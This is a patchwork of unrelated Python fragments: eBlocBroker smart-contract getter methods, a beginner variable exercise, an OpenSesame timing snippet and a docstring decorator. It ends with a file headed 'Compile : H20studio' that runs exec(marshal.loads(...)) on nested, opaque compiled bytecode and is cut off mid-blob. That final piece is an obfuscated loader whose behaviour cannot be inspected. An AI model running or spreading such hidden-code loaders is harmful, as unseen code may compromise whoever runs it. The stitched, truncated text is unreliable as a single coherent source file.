            return self.eBlocBroker.functions.getRegisteredDataPrice(*args).call()
def get_provider_prices_blocks(self, account):
    """Return block numbers where the provider's info changed.

    The first element is the most recent change and the last element is the
    latest block number where provider info changed.
    Ex: (12878247, 12950247, 12952047, 12988647)
    """
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.getUpdatedProviderPricesBlocks(account).call()
    return self.eBlocBroker.getUpdatedProviderPricesBlocks(account)
def is_owner(self, address) -> bool:
    """Return True if *address* is the contract owner (case-insensitive)."""
    owner = self.get_owner()
    return owner.lower() == address.lower()
def _get_provider_prices_for_job(self, *args):
    """Return the provider's prices applicable to a given job."""
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.getProviderPricesForJob(*args).call()
    return self.eBlocBroker.getProviderPricesForJob(*args)
def _get_job_info(self, *args):
    """Fetch job info from the contract."""
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.getJobInfo(*args).call()
    return self.eBlocBroker.getJobInfo(*args)
def get_user_orcid(self, user):
    """Return the ORCID registered for *user*."""
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.getUserOrcID(user).call()
    return self.eBlocBroker.getUserOrcID(user)
def _get_requester_info(self, requester):
    """Return (committed_block_num, orcid) for *requester*."""
    if not env.IS_BLOXBERG:
        committed_block_num = self.eBlocBroker.functions.getRequesterCommittmedBlock(requester).call()
    else:
        committed_block_num = self.eBlocBroker.getRequesterCommittmedBlock(requester)
    return committed_block_num, self.get_user_orcid(requester)
def get_owner(self):
    """Return the owner address of the ebloc-broker contract."""
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.getOwner().call()
    return self.eBlocBroker.getOwner()
def get_job_size(self, provider, key):
    """Return the size of the job for the given provider and key."""
    if env.IS_BLOXBERG:
        return self.eBlocBroker.getJobSize(provider, key)
    else:
        # Was `self.eBlocBroker.call().getJobSize(...)` — the pre-v5 web3.py
        # form; use `functions.fn(...).call()` for consistency with every
        # other getter in this class.
        return self.eBlocBroker.functions.getJobSize(provider, key).call()
def is_orcid_verified(self, address):
    """Return whether the ORCID of *address* is verified."""
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.isOrcIDVerified(address).call()
    return self.eBlocBroker.isOrcIDVerified(address)
def does_requester_exist(self, address):
    """Check whether the given Ethereum requester address is registered."""
    if not isinstance(address, (Account, LocalAccount)):
        address = self.w3.toChecksumAddress(address)
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.doesRequesterExist(address).call()
    return self.eBlocBroker.doesRequesterExist(address)
def does_provider_exist(self, address) -> bool:
    """Check whether the given provider address is registered."""
    if not isinstance(address, (Account, LocalAccount)):
        address = self.w3.toChecksumAddress(address)
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.doesProviderExist(address).call()
    return self.eBlocBroker.doesProviderExist(address)
def get_provider_receipt_node(self, provider_address, index):
    """Return the provider's receipt node at the given index."""
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.getProviderReceiptNode(provider_address, index).call()
    return self.eBlocBroker.getProviderReceiptNode(provider_address, index)
def get_provider_receipt_size(self, address):
    """Return the provider's receipt size."""
    if not isinstance(address, (Account, LocalAccount)):
        address = self.w3.toChecksumAddress(address)
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.getProviderReceiptSize(address).call()
    return self.eBlocBroker.getProviderReceiptSize(address)
def _is_orc_id_verified(self, address):
    """Return whether the ORCID of *address* is verified.

    NOTE(review): duplicates ``is_orcid_verified``; kept because external
    callers may use either name.
    """
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.isOrcIDVerified(address).call()
    return self.eBlocBroker.isOrcIDVerified(address)
def _get_provider_info(self, provider, prices_set_block_number=0):
    """Return ``(block_read_from, provider_price_info)`` for *provider*."""
    if env.IS_BLOXBERG:
        result = self.eBlocBroker.getProviderInfo(provider, prices_set_block_number)
    else:
        result = self.eBlocBroker.functions.getProviderInfo(
            provider, prices_set_block_number
        ).call()
    block_read_from, provider_price_info = result
    return block_read_from, provider_price_info
def eth_balance(self, account):
    """Return the on-chain balance of *account* via web3."""
    balance = self.w3.eth.get_balance(account)
    return balance
def get_balance(self, account):
    """Return the contract-tracked balance of *account*."""
    if not isinstance(account, (Account, LocalAccount)):
        account = self.w3.toChecksumAddress(account)
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.balanceOf(account).call()
    return self.eBlocBroker.balanceOf(account)
def get_providers(self):
    """Return the list of registered providers."""
    if not env.IS_BLOXBERG:
        return self.eBlocBroker.functions.getProviders().call()
    return self.eBlocBroker.getProviders()
def _get_provider_set_block_numbers(self, provider):
    """Return the last block number at which the provider's info was set."""
    if env.IS_BLOXBERG:
        block_numbers = self.eBlocBroker.getProviderSetBlockNumbers(provider)
    else:
        block_numbers = self.eBlocBroker.functions.getProviderSetBlockNumbers(provider).call()
    return block_numbers[-1]
def get_job_storage_time(self, provider_addr, source_code_hash):
    """Return the job storage duration time.

    Accepts *provider_addr* as a plain hex string (checksummed on the fly)
    and *source_code_hash* either as bytes32 or as an IPFS hash string.
    """
    if not isinstance(provider_addr, (Account, LocalAccount)):
        provider_addr = self.w3.toChecksumAddress(provider_addr)
    if isinstance(source_code_hash, str):
        try:
            source_code_hash = ipfs_to_bytes32(source_code_hash)
        except Exception:
            # Best-effort: a non-IPFS string is passed through unchanged.
            # Was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt.
            pass
    if env.IS_BLOXBERG:
        return self.eBlocBroker.getJobStorageTime(provider_addr, source_code_hash)
    else:
        return self.eBlocBroker.functions.getJobStorageTime(provider_addr, source_code_hash).call()
def get_received_storage_deposit(self, provider, requester, source_code_hash):
    """Return the received storage deposit for the given source code hash.

    *source_code_hash* may be bytes32 or an IPFS hash string.
    """
    ops = {"from": provider}
    if isinstance(source_code_hash, str):
        try:
            source_code_hash = ipfs_to_bytes32(source_code_hash)
        except Exception:
            # Best-effort: a non-IPFS string is passed through unchanged.
            # Was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt.
            pass
    if env.IS_BLOXBERG:
        return self.eBlocBroker.getReceivedStorageDeposit(provider, requester, source_code_hash, ops)
    else:
        return self.eBlocBroker.functions.getReceivedStorageDeposit(provider, requester, source_code_hash).call(ops)
class EBB:
    """Lazy singleton proxy around the ``Contract`` object.

    The underlying ``Contract`` is only instantiated on first use, so merely
    importing this module does not trigger any contract setup.
    """

    def __init__(self):
        self.eblocbroker: Union[Contract, None] = None

    def _set(self):
        # Create the Contract on demand; reuse it afterwards.
        if not self.eblocbroker:
            self.eblocbroker = Contract()

    def set(self):
        self._set()

    def __getattr__(self, name) -> Contract:
        """Forward unknown attribute access to the lazily created Contract."""
        self._set()
        return getattr(self.eblocbroker, name)


Ebb = EBB()
|
# Exercise: assign one variable to another.
# Start with a favorite_food of 'steak' ...
favorite_food = 'steak'
print(favorite_food)

# ... then introduce food = 'pizza' and rebind favorite_food to it.
food = 'pizza'
favorite_food = food
print(favorite_food)
|
# Prepare canvas 1 and 2
canvas1 = canvas(exp)
canvas1.text('This is the first canvas')
canvas2 = canvas(exp)
canvas2.text('This is the second canvas')
# Show canvas 1 and record its onset time
t1 = canvas1.show()
# Sleep for 95 ms to get a 100 ms delay
self.sleep(95)
# Show canvas 2
t2 = canvas2.show()
# The actual delay will be 100 ms, because stimulus
# preparation time is not included. This is good!
# Fixed: was a Python-2 `print` statement, which is a SyntaxError on Python 3;
# use the print() function (valid on both 2.7 and 3.x).
print('Actual delay: %s' % (t2 - t1))
|
"""Utilties for documentation."""
def docstring_parameter(*args, **kwargs):
    """Decorator that fills ``str.format`` placeholders in a docstring.

    Examples
    --------
    >>> @docstring_parameter('test', answer='Yes it does.')
    ... def do_nothing():
    ...     '''Does this {} do anything? {answer}'''
    ...     pass
    >>> print(do_nothing.__doc__)
    Does this test do anything? Yes it does.
    """
    def _apply(obj):
        # Format the wrapped object's docstring in place and return it.
        obj.__doc__ = obj.__doc__.format(*args, **kwargs)
        return obj

    return _apply
|
#----------------------------------------
# Compile : H20studio
# Youtube : H20 Studio
#----------------------------------------
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf4Y\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsiY\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xdeX\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsSX\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xc8W\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns=W\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb2V\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\'V\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x
00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x9cU\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x11U\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x86T\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xfbS\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NspS\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe5R\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsZR\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xcfQ\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsDQ\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04
\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb9P\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns.P\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa3O\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x18O\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x8dN\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x02N\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NswM\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xecL\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsaL\x00\x00\x
e3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xd6K\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsKK\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xc0J\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns5J\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xaaI\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x1fI\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x94H\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\tH\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\
x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns~G\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf3F\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NshF\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xddE\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsRE\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xc7D\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns<D\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb1C\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns&C\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s
\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x9bB\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x10B\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x85A\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xfa@\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nso@\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe4?\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsY?\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xce>\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsC>\x00\x00\xe3\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb8=\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns-=\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa2<\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17<\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x8c;\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x01;\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsv:\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x